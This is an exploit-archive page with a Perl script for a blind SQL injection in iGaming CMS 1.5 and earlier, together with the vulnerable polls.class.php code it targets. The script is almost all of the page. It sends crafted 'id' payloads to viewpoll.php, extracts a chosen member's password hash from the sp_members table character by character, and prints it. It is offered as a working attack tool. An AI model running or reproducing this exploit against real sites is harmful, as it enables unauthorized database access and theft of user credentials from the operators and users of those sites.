iGaming CMS <= 1.5 Blind SQL Injection

2010-10-01 10:15:56

#!/usr/bin/env perl

=pod
iGaming CMS <= 1.5 Blind SQL Injection

Author: plucky
Email: [email protected]
Web Site: http://plucky.heliohost.org
Crew : WarWolfZ

Usage: perl exploit.pl <website> <user_id>
Example: perl exploit.pl http://website.net/iGamingCMS1.5/ 1

Vulnerability: polls.class.php
[line 10-17]

if (!empty($_REQUEST['id']))
{
$poll = $db->Execute("
SELECT id,title
FROM `sp_polls`
WHERE `id` = '" . $_REQUEST['id'] . "'");

$result = $db->Execute("SELECT * FROM sp_polls_options WHERE poll_id = '$_REQUEST[id]' ORDER BY id");

THX TO: shrod and warwolfz crew
=cut

use strict;
use warnings;
use LWP::Simple;

my $password = '';
my $vulnerable_page = '';

my $target_id = 1;

sub header_exploit {

print 'iGaming CMS <= 1.5 Blind SQL Injection' . "\n".
'-----------------------------------------' . "\n".
'Author: plucky' . "\n".
'Email: [email protected]' . "\n".
'-----------------------------------------' . "\n".
'[!]Target id: '.$target_id . "\n".
'[!]Exploit Status: Working...' . "\n";
}

sub usage_exploit {

print 'Usage:' . "\n".
' perl exploit.pl http://[site]/[path]/ [id]' . "\n".
'Examples:' . "\n".
' perl' . $0 . 'http://web_site/cms/ 1' . "\n".
' perl' . $0 . 'http://games_site/iGamingCMS1.5/ 1' . "\n";

exit;
}

sub run_exploit {

my $parameter_id = shift;
my $parameter_page = shift;

my $target_id = $$parameter_id;
my $vulnerable_page = $$parameter_page;

my $character_id = 1;

my $HTML_source = '';
my $SQL_Injection = '';
my $hexadecimal_character = '';
my $result = '';
my $table = 'sp_members';

my @hexadecimal_characters = ( 48..57, 97..102 );


foreach $character_id ( 1..32 ) {

character_research:
foreach $hexadecimal_character ( @hexadecimal_characters ) {

$SQL_Injection = "viewpoll.php?id=' or ascii(substring((select pass from $table where id=$target_id),$character_id,1))=$hexadecimal_character\%23";
$HTML_source = get( $vulnerable_page.$SQL_Injection );

if ( $HTML_source !~ /Error/i ) {

$result .= chr($hexadecimal_character);
$character_id++;

last character_research;
}
}
}

return $result;
}

$vulnerable_page = $ARGV[0] || usage_exploit;
$target_id = $ARGV[1] || usage_exploit;

header_exploit;
$password = run_exploit ( \$target_id, \$vulnerable_page );

print '[!]Password: ', $password, "\n";

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.